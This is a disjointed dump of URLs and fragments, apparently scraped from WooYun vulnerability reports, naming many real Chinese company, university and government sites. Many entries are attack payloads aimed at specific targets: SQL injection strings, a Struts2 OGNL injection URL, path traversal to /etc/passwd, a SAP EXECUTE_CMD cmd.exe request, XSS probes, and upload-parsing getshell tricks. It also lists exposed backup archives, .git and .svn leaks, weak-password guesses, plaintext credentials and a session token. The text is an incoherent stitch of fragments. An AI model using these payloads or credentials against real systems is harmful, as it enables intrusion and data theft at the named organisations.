http://www.huayiyuan.com/attachment/201510/16/1889201_14450084090jOf.jpg/.php http://wooyun.org/bugs/wooyun-2015-0147241 http://pay.neuedu.com/login_view.action encap:Ethernet addr:10.3.17.40 Bcast:10.3.17.127 Mask:255.255.255.128 fe8b:3/64 Scope:Link MTU:1500 packets:245540099 packets:233582617 txqueuelen:1000 http://**.**.**.**/yyoa/common/SelectPerson/reloadData.jsp http://**.**.**.**/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**/chn200905080651561/article.jsp?articleId=759 http://esp.haier.com/km/kb_loglist.jsp?userno=-1+OR+17-7=10&flag=3 http://t.qianbao666.com/api/1/msg/getInfo.api?id=176041 http://**.**.**.**/ http://**.**.**.**/Report/StandardReport.aspx?filename=Install&es_installid=198005 http://**.**.**.**/ContractDirectory http://www.edhic.com http://www.edhic.com/shop/yh/zhmm/ http://**.**.**.**:80/ http://**.**.**.**/index!down.action存在命令执行漏洞 http://**.**.**.**/ http://**.**.**.**/member/pinfo.html https://**.**.**.**/netgen-inc/weibo_sender/blob/master/test/etc/unit.original.json http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.bj.**.**.**.** http://xy.**.**.**.** http://u_**.**.**.** http://www.sjz.**.**.**.** http://dikapfw.**.**.**.** http://w**.**.**.** http://bj.**.**.**.** http://ww.**.**.**.** http://st.**.**.**.** http://sh.**.**.**.** http://web.**.**.**.** http://huizhou.**.**.**.** http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**:8080/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/school/AddSchool.aspx?t=0.8808870588783335&code=01 http://**.**.**.**/admin/school/AddSchool.aspx?t=0.8808870588783335&code=01 http://**.**.**.**/admin/school/AddSchool.aspx?t=0.8808870588783335&code=01 http://**.**.**.**/admin/school/AddSchool.aspx?t=0.8808870588783335&code=01 http://**.**.**.**/admin/school/AddSchool.aspx?t=0.8808870588783335&code=01 https://github.com/lusionx/hy-frame/blob/24fccd6ce850e2d358cebce672a9f3270eba3f62/HY.Frame.Web/Web.config Id:0;996 Package:Negotiate User:TIAOMACESHI$ Domain:WORKGROUP Id:0;64854009 Package:Negotiate User:ASP.NET Domain:IIS Id:0;583897 Package:NTLM User:Administrator Domain:TIAOMACESHI Id:0;997 Package:Negotiate User:LOCAL Id:0;37237 Package:NTLM http://crm.gtcloud.cn/ http://www.kingsunedu.com/Manager/default.aspx可以直接访问,其他页面有验证。 http://uums.kingsun.cn http://oa.joyu.com/.svn/entries http://oa.joyu.com/ http://www.krbb.cn/login/chklogin.asp http://www.krbb.cn/login/chklogin.asp http://**.**.**.**/ccsenews/a/epaper_content_show.asp?EpaperID=47&ContentTypeID=3&SerialNo=1 http://**.**.**.**/ccsenews/a/epaper_content_show.asp?EpaperID=47&ContentTypeID=3&SerialNo=1 http://**.**.**.**/love/love_go/pairs/YZComment.asp?pid=184 http://**.**.**.**/ccsenews/a/epaper_content_show.asp?EpaperID=47&ContentTypeID=3&SerialNo=1 http://**.**.**.**/department_newsdetial.php?news_id=889&type_id=3&t_id= http://**.**.**.**/Specimen/specimen.php?taiid=013529 http://**.**.**.**:88/thesis/view_etd.asp?URN=100424019 http://**.**.**.**/chi/guestboard2.php?original_id=3113 http://**.**.**.**/ETD-db/ETD-search/getfile?URN=etd-0830111-174602 http://**.**.**.**/paper_management/index.php?conf_alias=iihmsp10 http://**.**.**.**/chi/guestboard2.php?original_id=3113 http://211.162.66.44/ http://211.162.66.44/oanames.nsf webpage.nsf/cpassword?OpenForm webpage.nsf/main8?ReadForm webpage.nsf/portal?readForm&PortalUNID= todo.nsf/mainframeset?openframeset http://3g.trip8080.com/tologin.htm http://www.emaotai.cn/ http://www.emaotai.cn/User/ReplyReceivedMessage.aspx?MessageId=***** http://**.**.**.**/ http://**.**.**.**/Member/CheckMember.aspx http://**.**.**.** http://**.**.**.**/website/dfxhs_cx_gs.asp?DwID=7297 http://**.**.**.**/website/dfxhs_cx_gs.asp?DwID=7297 http://**.**.**.**:80/ http://cer.nju.edu.cn/amserver/UI/Login?goto=http://cms.nju.edu.cn/console/application.do&gotoOnFail=http://cms.nju.edu.cn/console/doLogin.do name:test password:123456 http://**.**.**.**/bugs/wooyun-2010-0136212 http://**.**.**.**/bugs/wooyun-2010-0136013 http://**.**.**.**/bugs/wooyun-2010-0112009 http://**.**.**.**:8888/hotelbs/default.aspx http://**.**.**.**/default.aspx http://**.**.**.**:235/dylgy/login.aspx http://**.**.**.**/default.aspx http://**.**.**.**/admin/ch/jsp/LoginCheck_initLogin.action http://**.**.**.**/docs/s2-016.html http://**.**.**.**/ http://**.**.**.**/www/index.php?mod=admin&con=subscribe&act=unsubscribe&subsId=31&userId=880&papers_cn=%B8%D6%CC%FA%C2%AF%C1%CF&papers_en=gtll http://**.**.**.**/www/index.php?mod=admin&con=subscribe&act=unsubscribe&subsId=31&userId=880&papers_cn=%B8%D6%CC%FA%C2%AF%C1%CF&papers_en=gtll http://**.**.**.**/www/index.php?mod=admin&con=subscribe&act=unsubscribe&subsId=31&userId=880&papers_cn=%B8%D6%CC%FA%C2%AF%C1%CF&papers_en=gtll http://**.**.**.**/www/index.php?mod=admin&con=subscribe&act=unsubscribe&subsId=31&userId=880&papers_cn=%B8%D6%CC%FA%C2%AF%C1%CF&papers_en=gtll http://**.**.**.**/www/index.php?mod=admin&con=subscribe&act=unsubscribe&subsId=31&userId=880&papers_cn=%B8%D6%CC%FA%C2%AF%C1%CF&papers_en=gtll http://**.**.**.**/phpMyAdmin/ http://**.**.**.**/phpinfo.php http://www.huayiweibo.com/ xx.jpg/.php或xx.jpg%00.php xx.jpg/.php,于是一句话Getshell: http://**.**.**.**/asord/asord_record.php?title=1 http://118.26.224.141/ http://sso.chinaums.com//eWebEditor/admin/login.jsp http://123.124.249.24:8009 http://app.ent.ifeng.com/movie/admin/edit/680 http://app.ent.ifeng.com//movie/admin/uploads/utf.php http://cc.bnchina.com/manage/images/upimg/29046619.aspx?_post___VIEWSTATE=%2FwEPaA8FDzhkMmQ3ZDkxNTc0YmVkZWQ%3D&UPass=88952634&Button_Login=Login http://**.**.**.**/smuexam/admin/salogin.asp http://xianchang03.danmu.tudou.com/index.do http://xianchang03.danmu.tudou.com/dmplayer.do?uid=1&iid=192908540&icode=Z0MtBBwgKVc&aid=0&vcode=&lid=0 http://wap.neuedu.com/crm/login_view.action http://wap.neuedu.com/bug/login_view.action http://wap.neuedu.com/crm/login_view.action http://wap.neuedu.com/bug/login_view.action encap:Ethernet addr:10.3.17.11 Bcast:10.3.17.127 Mask:255.255.255.128 fe8b:36/64 Scope:Link MTU:1500 packets:1396117638 packets:788728684 txqueuelen:1000 http://**.**.**.**//sysTemplateWeb/ShowWebStyle.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**//sysTemplateWeb/ShowWebStyle.aspx http://**.**.**.**/sysTemplateWeb/ShowWebStyle.aspx http://**.**.**.**//sysTemplateWeb/ShowWebStyle.aspx http://**.**.**.**//sysTemplateWeb/ShowWebStyle.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**//sysTemplateWeb/ShowWebStyle.aspx?XXDM=440203000008&CatalogId=110101 http://www.redcross.ecnu.edu.cn http://www.redcross.ecnu.edu.cn/houtai/login.asp http://www.redcross.ecnu.edu.cn/houtai/Edit/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2Fwww.redcross.ecnu.edu.cn%2Fhoutai%2FEdit%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp http://zsbm.dec.ecnu.edu.cn/wems/zsgl/XslqcxIndex.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://**.**.**.**/index.aspx?varCatyID=010101 http://**.**.**.**/admin/login.aspx http://**.**.**.**/ http://**.**.**.**:2222 http://**.**.**.**/zsjy/list_2011.php?catid=138&bid=11 http://**.**.**.**/zsb/list.asp?classid=18该网站 http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://**.**.**.**/oa/oa_ContentView.aspx http://tsg.cqupt.edu.cn/software_download/sw_download.php?sw_url= http://tsg.cqupt.edu.cn/software_download/sw_download.php?sw_url=./sw_download.php http://**.**.**.**/jttzt/service/Content.aspx?artid=5fc367b5-9038-45a9-a9b1-42c172d74816 http://**.**.**.**/webquery_login.asp http://**.**.**.**:8080/luqu/ http://**.**.**.**/bugs/wooyun-2015-0147226 http://sns.neusoft.com/ http://zone.wooyun.org/content/23175 https://portal.neusoft.com https://www.airkunming.com/payByOrder?orderNo=TK201401112308563 https://www.airkunming.com/payByOrder?orderNo=TK201404212362327 http://www.jinch-home.com//Public/js/php/file_manager_json.php http://www.banchang.cc/Public/js/php/file_manager_json.php jdbc:oracle:oci:@landres http://**.**.**.**/ http://**.**.**.**/chinese/saic_motor_hr/user/file.aspx http://**.**.**.**/chinese/saic_motor_hr/user/ http://**.**.**.**/web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://**.**.**.**//web/web_programs_dotnet/BBS/index.aspx http://www.sinopecsales.com http://**.**.**.**/search.php http://itpapers.zdnet.com.cn:80/files/search.php?page=1&user=suxuhui http://**.**.**.**/epro/EBid/ManageBid/InviteFee_Edit.asp?TransHistoryId=5112 http://**.**.**.**/Rat/EBid/ManageBid/InviteFee_Edit.asp?TransHistoryId=5112 http://**.**.**.**/Rat//EBid/ManageBid/InviteFee_Edit.asp?TransHistoryId=5112 http://**.**.**.**/pkpmbs/template/rptquerysetlist.aspx?SUBMIT_TYPE=0&defineid=-1&lzstat_uv=34338219962842780482|1738820&__back2definelist=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/template/rptquerysetlist.aspx?SUBMIT_TYPE=0&defineid=-1&lzstat_uv=34338219962842780482|1738820&__back2definelist=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/template/rptquerysetlist.aspx?SUBMIT_TYPE=0&defineid=-1&lzstat_uv=34338219962842780482|1738820&__back2definelist=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/template/rptquerysetlist.aspx?SUBMIT_TYPE=0&defineid=-1&lzstat_uv=34338219962842780482|1738820&__back2definelist=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://edm.51itapp.com/dingyue.asp?id=28493995&taskid=7999&keyid=71312 http://p.eqitong.com/index.php/home http://123.150.175.184/ http://123.150.175.180/ http://**.**.**.**/webs/indentify_xmVerify.action存在命令执行漏洞 http://www.class.cn/reset_passwd/reset_show?key=v3IHUKzcpN7iqrCPsGQ0&email=penetest1@163.com http://wtht.wtjr.com http://m.yaofangwang.com/App/forgetpsw.aspx http://www.yingke.tv/Product/ExchangeTicket.aspx?cityid=12 http://www.yingke.tv/MovieList.aspx?keyword=a http://www.yingke.tv/MovieList.aspx?PlayType=2 http://www.yingke.tv/Product/MovieCard.aspx?cityid=11 http://www.yingke.tv/CinemaList.aspx?cityid=11 http://www.yingke.tv/Product/PaperTicket.aspx?cityid=11 http://www.yingke.tv/Shop/ShopDetail.aspx?id=1103 http://www.yingke.tv/Shop/ShopIndex.aspx?categorysubid=82 http://www.yingke.tv/HelpCenter.aspx?id=7 https://**.**.**.** http://**.**.**.**/mh2/login.do http://gps.dongfeng.net/ http://**.**.**.**/Default.aspx?sid=01 https://debug.dingtalk.com/ http://**.**.**.**/personalArea/yljl2.jsp?xsjl_hs=1350003 http://crewinternal.juneyaoair.com:65/ http://sms.juneyaoair.com:9080/SMSNEW/oa!aircrewLogin?username=BaiNingKai&airuser.aircrewName=BaiNingKai&airuser.aircrewDepartment.aircrewDeptCode=FL17 https://exmail.qq.com http://vcp.jd.com/sub_itemext/advisory/initListPage http://shop.chat.jd.com/work/waiterDailyWorkKpi.action?searchCode=0 http://fy.ljth.com http://fy.ljth.com:80/config/ HTTP/1.1 http://fy.ljth.com:80/image/ HTTP/1.1 http://fy.ljth.com:80/UploadFile/ HTTP/1.1 http://fy.ljth.com:80/system/ HTTP/1.1 http://fy.ljth.com:80/script/ HTTP/1.1 http://fy.ljth.com:80/Log/ HTTP/1.1 http://fy.ljth.com:80/ HTTP/1.1 http://fy.ljth.com/system/adminuser.aspx http://**.**.**.**/webs/personalCenter.action存在命令执行漏洞 http://twww.novartis.com.cn/login/noLoginHome.action http://twww.novartis.com.cn/xx.jsp http://otrivin.novartis.com.cn http://www.novartis.com.cn http://lib.shisu.edu.cn/news_detail.aspx?news_id=19 http://lib.shisu.edu.cn/zydt_detail.aspx?zydt_id=17 http://121.201.33.11:5002/ http://sqlmap.org http://svqd.inspur.com/svqd/jsp/svqd/zhuce/zhuce.jsp https://**.**.**.**/ https://github.com/wangqiaoshi/RealtimeTest/blob/569cee5761e34f1c02b8073636c3bcdf4c35729b/src/main/resources/properties/mail.properties http://**.**.**.** http://bbs.kingsoftstore.com www.ksosoft.com http://www.ksosoft.com/1.txt http://**.**.**.**/kjzb/aqkj/201111/t20111125_189483.htm MYSQL:3306)弱口令: http://www.xiuna.com/ http://zzjz2.edong.com/down/index.php?author=&c http://**.**.**.**/zfcg/FileDown.jsp?fname=userfilesWai/../../../../../etc/passwd https://oa.kysec.cn/login/Login.jsp?logintype=1 https://oa.kysec.cn//weaver/weaver.file.FileDownload?fileid=516&download=1 http://oa.kysec.cn/phpinfo.php http://wap.kysec.cn/phpinfo.php www.kysec.cn/qk.rar http://**.**.**.**/BookList.aspx?e=70ba83fe-b250-40ce-9621-7e7cd7ec33dd http://mail.baofeng.com/ http://**.**.**.**/cct/jpkc_d-new.asp?bk=lxs http://**.**.**.**/cct/jpkc_d-new.asp?bk=lxs http://**.**.**.**/cct/jpkc_d-new.asp?bk=lxs http://pg.yadea.com.cn/phpmyadmin/index.php http://**.**.**.**/zccx/Login http://**.**.**.**/webtool/ http://**.**.**.**/cathay-ins/help/detail.do?id=13%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://**.**.**.**/SunECM/index.jsp http://**.**.**.**/)直接点击集团版在线试用 http://admin.91huayi.com/web.rar http://cms.91huayi.com/cms.91huayi.com.rar http://dz.91huayi.com/web.rar http://passport.91huayi.com/passport.91huayi.com.rar http://help.ule.com/helpcenter/2011-10-17-05-49-50.html?uspm=1.1.1_V2014.144.4.1 https://github.com/huyugui1979/TopMedicalNews/blob/1da0799ddeb79ece871476d3b3cb87635eb1c5f6/TopMedicalNews/Business/UserService.cs http://iapp.iiyi.com/zlzs/v7/user/sendcode/?phone=13333333333&os=3 iapp.iiyi.com/zlzs/v7/user/reset/?username=13333333333&password=123123qq&vcode=854342&os=3 http://iapp.iiyi.com/zlzs/v7/user/modpwd/?uid=4902960&oldpwd=123456&newpwd=123456qq http://bbs.iiyi.com/home.php?mod=space&uid=4900006 http://complaint.ceair.com/Complaint/Welcome.do http://olms.sinopec.com/slmwebapp/ http://olms.sinopec.com http://admin.1jiajie.com/v2/index.php?action=login https://ssl.mail.163.com/config.mail.163.com/multiAccount/service/relateAccount.do http://zzjz2.edong.com/down/memberdown.php?imageField=&key=1&mid=150&myord=*&myshownums=20&pcatid=0 http://blog.dhgate.com/wp-login.php http://open.dhgate.com/ http://open.dhgate.com/phpsso_server/index.php http://seller.dhgate.com/seller.tar.gz http://bbs.dhgate.com/source/plugin/tools/tools.php http://**.**.**.**/ index.php/send/sendlist/send_for/?tid=&title=1 index.php/send/sendlist/send_for/?tid=&title=1% http://**.**.**.**/bugs/wooyun-2010-0133376 http://**.**.**.**/extmail/cgi/netdisk.cgi?__mode=list_dir&sid=xxxxf&base=../ http://**.**.**.**/extmail/cgi/readmsg.cgi?__mode=readmsg_sum&sid=xxxxxxxxxxxx&folder=Inbox&msgid=1425325541.M840749P12107V0000000000000802I00000000057872F9_0.mail2014,S=25968:2,S&pos=0 http://www.qtparking.com:80/weixin"+"/zhiFuSuccess?parkCode="+"XXXXXXXXXXXXXXX"+"&userOpenId="+"XXXXXXXXXXXX"+"&outTradeNo="+"XXXXXXXXXXXXXXX http://www.zzidc.com.cn/index.php?cn-s-l-1-1.html http://www.pccb.com/ http://www.dfsszc.com/news.aspx?m=20131120105122323641&n=20131211105954567052 http://**.**.**.**/gen_extra/article/baike.action?channel=hyfx&channelId=34e39156-1f1e-4551-85f1-7db2009b14d9 mse.sogou.com/fb.php http://mse.sogou.com http://**.**.**.**/login.jsp http://**.**.**.**/yuyue/yy-5.html?wid=157&wxid=xx http://**.**.**.**/yuyue/myby-5.html?wid=157 http://**.**.**.**/register/addUi.action http://**.**.**.**/ https://**.**.**.**/szogroup/szojava/tree/fadf2629feed21273dbeeb4dd6dc94b98a28abd5/src/test/java/com/szo/app/service http://munion.meituan.com/ juneyao.com/123456 juneyao.com/12345678 juneyao.com/12345678 juneyao.com/111111 juneyao.com/666666 juneyao.com/123456 juneyao.com/qwer1234 juneyao.com/juneyao http://**.**.**.** http://**.**.**.**/ad/ http://**.**.**.**/admin/ http://**.**.**.**/api/ http://**.**.**.**/aspupload/ http://**.**.**.**/database/ http://**.**.**.**/editor/ http://**.**.**.**/inc/ http://**.**.**.**/reg/ http://**.**.**.**/aspupload/09_misc/DirectoryListing.asp?Dir=c:\ http://**.**.**.**/xiaoyou/index1.asp http://**.**.**.**/xiaoyou/admin/admin_index.asp http://58.251.8.70:8000/ http://58.251.8.70:8000/ftb.imagegallery.aspx http://58.251.8.70:8000 http://**.**.**.**/bugs/wooyun-2010-0122195 http://**.**.**.**/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1 http://**.**.**.**/ http://**.**.**.**/data/ http://**.**.**.**/upload/ http://**.**.**.**:8089/ShowResource/ResourceInfo.aspx?ResourceID=MQ==&ClassPath=&ChinaSort=01.11&ClassTypeID=&ResourceIDs= http://**.**.**.**:8082/ShowResource/ResourceInfo.aspx?ResourceID=MQ==&ClassPath=&ChinaSort=01.11&ClassTypeID=&ResourceIDs= http://**.**.**.**:8001/ShowResource/ResourceInfo.aspx?ResourceID=MQ==&ClassPath=&ChinaSort=01.11&ClassTypeID=&ResourceIDs= http://**.**.**.**:8089/ShowResource/ResourceInfo.aspx?ResourceID=MQ==&ClassPath=&ChinaSort=01.11&ClassTypeID=&ResourceIDs= http://**.**.**.**/ShowResource/ResourceInfo.aspx?ResourceID=MQ==&ClassPath=&ChinaSort=01.11&ClassTypeID=&ResourceIDs= http://202.118.10.130:8080/platform/help/english/images/eng.jsp的一句话,爆破一下,发现了密码弱智,q,连上去翻了翻,发现好几个小马一句话 http://fx.svip.sohu.com/oauth.php?share_id=1 http://**.**.**.**/hbagri/more.do?lanmu_id=12%27&siteid=0 http://go.huanqiu.com/service/vacation?callback=show_vacation&dest=1 http://oa.guobinjiu.cn/yyoa/index.jsp http://oa.guobinjiu.cn/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://oa2.xiaoniu66.com:5081/index.action http://**.**.**.**/bugs/wooyun-2015-0147646 http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://**.**.**.**/oa/oa_ContentView.aspx?NRID= http://www.fun.tv/风行网-官方网站 http://www.fun.tv index.php/recv/register/register_for/?tid=&title=1 index.php/recv/register/register_for/?tid=&title=1 index.php/recv/register/register_for/?tid=&title=1 http://m.1jiajie.com/login.php?from=wx&weixin_id=o7KvajnDlhdcL55L3CNAUepawQC4 http://oa.jcbx.pudong-edu.sh.cn/areateablog/TeachMyselfTimer.aspx?UID=106586 http://219.239.89.48/index.php/site/login http://118.122.88.90:65000//bos/desktop/RequestOrResponse.aspx http://**.**.**.**:9002/ http://cxb.chexiang.com//service/userCenter/getUserInfo/0 https://oa.kysec.cn/homepage/LoginHomepage.jsp?hpid=52&isfromportal=1 https://oa.kysec.cn/homepage/LoginHomepage.jsp?hpid=52&isfromportal=1 http://**.**.**.**/rhdc_client/jsp/BeforForgetPassword_Control.jsp?logname=-1 http://**.**.**.**/backadmin/login.jsp http://**.**.**.**/wenhuashichang/index.php?id=293 http://**.**.**.**/gongshiwenjian/wenjian/20151020103311.php encap:Ethernet B8:CA:3A:F1:25:8E baca:3aff:fef1:258e/64 Scope:Link MTU:1500 packets:5624966904 packets:7543034697 txqueuelen:1000 http://**.**.**.**/ http://sapbo.nanchu.com:50000//ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe/c http://182.151.206.253/ http://www.pccb.com/activity/app http://mp.weicheche.cn/ http://**.**.**.**/pay/ http://mail.haodf.com/ http://agentapi.dujia.qunar.com/showAllSupplierEmail.do http://mail.itouzi.com/ http://mail.qufenqi.com/ http://61.144.241.87:8080/login/Login.jsp http://61.144.241.87:8080/myname/footer.jsp jdbc:oracle:thin:@192.168.101.187:1521:orcl jdbc:oracle:thin:@192.168.101.241:1521:orcl http://eip-portal-test.dongfeng-renault.com.cn/login.jsp http://**.**.**.**/Waterrate/login/ http://xs.emaotai.cn/emaotai.rar http://wap.emaotai.cn/emaotai.rar http://mt.emaotai.cn/emaotai.rar http://gy.emaotai.cn/emaotai.rar http://erp.emaotai.cn/emaotai.rar http://b2b.emaotai.cn/emaotai.rar http://mail.renrenche.com/ http://123.103.86.55/此处目录浏览 http://bbs.pccb.com/Forum/Index/bbsDetail?id=36975&type_id=1&f_t=1&p=7 http://**.**.**.**:8086/gdlisweb/ScarchList.aspx http://**.**.**.**:82/netweb/ScarchList.aspx http://**.**.**.**/ScarchList.aspx http://www.emaotai.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=103 http://exmail.qq.com/login http://zyjn.yfzxmn.cn:8083/zyjn/examTab_get.action?so_Id=227&su_Id=15&ex_type=&ex_time=&sort=ex_Showtime&nowPage=58存在命令执行漏洞 http://**.**.**.**/news_content.php?nno=1006&backurl=index.php http://**.**.**.**/tna.zip http://**.**.**.**/info.php http://**.**.**.**/phpinfo.php http://oa.baixiangfood.com/messager/users.data可以直接打开,数据经过base64加密 http://**.**.**.**/manage/admin/admin_login.aspx http://www.gtcloud.cn/wh/servlet/MainServer?doNothing=Y&nextPage=/login.jsp&login_dept_type=0&spec_login_dept_type=0&flag=&wp_id=0&trivallog=0 http://www.gtcloud.cn/wh/jsp/component/workflow/wfformhisview.jsp?refresh=Y&workflow_id=2014161¤tTaskId=0 http://www.dfss-club.com/service/class.jsp?id=799 http://api.zhaoxiaoshuo.com/ http://test.hotemall.com/test.tar.gz http://**.**.**.**/WeiXin/NavigationArticle.aspx?id=oirjajpnB4Fj0ixgQme_LqPR8fEg&articleId=55 http://**.**.**.**/sys/cx/zj/newzj/newfindRy.jsp?pageNo=33&name=%27+%2B+ltrim%28%27%27%29+%2B+%27&zgcard= http://**.**.**.**/custom.asp?id=17 http://**.**.**.**/admin/login.asp c058:6301::c058:6301 d5c1:ccf5 d5c1:ccf5%16 http://www.midifan.com/modulesecond-index.htm?issale=1%27%22 http://www.midifan.com/modulesoftware-detailview-4338'.htm http://www.midifan.com/modulenews-index.htm?key=%2527%27 http://www.midifan.com/modulearticle-index.htm?categoryid=-1%27 http://www.midifan.com/modulesecond-index.htm?issale=1*'--+ http://qqtouchbianmin.trip8080.com/tologin.htm触屏版登录的地方,没有验证码,没有登录限制,抓包发现用户名密码均明文传输的,可以fuzzing。。 http://**.**.**.**/banner/Addpicture.aspx?OrderId=35 username:root password:root http://jpkc.ecnu.edu.cn:80/0802/bbs/show.asp?id=1 http://www.emaotai.cn:90/zyd/LoginTo.aspx http://**.**.**.**/jgxx2.asp?id=9 http://**.**.**.**/Case/Default.aspx http://**.**.**/om/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= http://**.**.**/c6//login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= http://**.**.**/wfb/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= http://itil.ecnu.edu.cn/itsm/index-withoutCA.jsp http://itil.ecnu.edu.cn/itsm/register.do?register=1 http://itil.ecnu.edu.cn/itsm/ssd/ http://itil.ecnu.edu.cn/itsm/security/userMgt.do?method=userDetails&id=1 http://itil.ecnu.edu.cn/ http://bj.cs.ecitic.com/中信证券北京分公司 http://mail.wahaha.com.cn/ http://www.cetools.cn/index.php/cetools/login index.php/cetools/logincheck/026bdd86-6c4c-5645-b158-b57cb5bffa3a index.php/cetools/pxdatadetail?id=20&type=1 http://**.**.**.** inurl:login http://**.**.**.**/epss/login.do?sspeu=MjcxMDMwMzAwMg==&sspep=NDE2Njg2MjMx http://**.**.**.**/epss/login.do?sspeu=MjU1MDMwMjA2MQ==&sspep=enVueWk1MTAw http://**.**.**.**/epss/login.do?sspeu=MjQ1MTEwMTk5OQ==&sspep=c3dqNjkxMDI0 http://www.mob.com/pay/alipay/sms?id=2015102049985453&amount=1 http://**.**.**.**/ROlist.aspx?tab1=%ba%cf%d7%e2 com:8080 www.bobo.com,会自动登陆bobo。自动登陆流程如下 http://bobo.163.com/checkAuth?url=http://www.bobo.com/& http://www.bobo.com/auth?NTES_SESS=eVDnHhKqQ5phQfq.SUhKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX0Fz3t.Al2XXgmlY5D8B6zOijFOLH5QM2JXXXXXXXXXXXXLpu7_yJRQLaO0UEF8WpHDS1qJ4_Wmt8qKDG0QHAMnsgcZsae_Af0Ow.65B4BcoDsu9xS1v45ORinZLH&url=http://www.bobo.com/& http://www.bobo.com/ www.bobo.com的XSS即可 http://www.df-finance.com.cn/store/agencylogin.shtml http://**.**.**.**/en/admin/login.aspx http://**.**.**.** http://**.**.**.**/HrMarket_Person/Common/DownLoad/9556 http://**.**.**.**/HrMarket_Person/EditResume/_PartialDeleteAttachment http://**.**.**.** http://mail.mszq.com http://211.151.60.199/ http://lidroid.com/article?id=107 https://m.hongkongairlines.com/ci/data/php/queryArticleByTitle_sqlite.php?title=e'union http://www.bksms.sdu.edu.cn/login www.bksms.sdu.edu.cn http://www.cetools.cn/index.php/cetools_admin/login http://**.**.**.**/ http://**.**.**.**/jsp/ http://**.**.**.**/jsp/j/ http://**.**.**.**/jsp/j/success.jsp http://**.**.**.**/jsp/j/fail.jsp http://data.qiban365.com http://data.qiban365.com/lnwjm/index.php/home/Index/newscontent?id=11e4-d817-dd8d2630-b4e3-210735dca24b www.lvmama.com http://www.lvmama.com http://t-www.brandwisdom.cn/ http://118.26.238.91:8080/ http://t-www.brandwisdom.cn/?s=/Login/login.html http://118.26.238.91:8080/.git/config http://app.focussend.com/webservice/FocusSendWebService.asmx?WSDL http://exam.cmbc.com.cn/wis18/config/ http://exam.cmbc.com.cn/wis18/system/ http://exam.cmbc.com.cn/wis18/upload/ http://**.**.**.**/banshizn.aspx?mkbm=-7837 http://**.**.**.** http://**.**.**.**/pqfcx.go http://**.**.**.**/mallhome.go?updatepass= http://**.**.**.**/mallhome.go?close= http://**.**.**.**/mallhome.go?yhxx= http://**.**.**.**/gly/adminlogin.asp,挑一个跟我心情一般沉重的万能密码 http://dmoa.cofco.com/seeyon/index.jsp 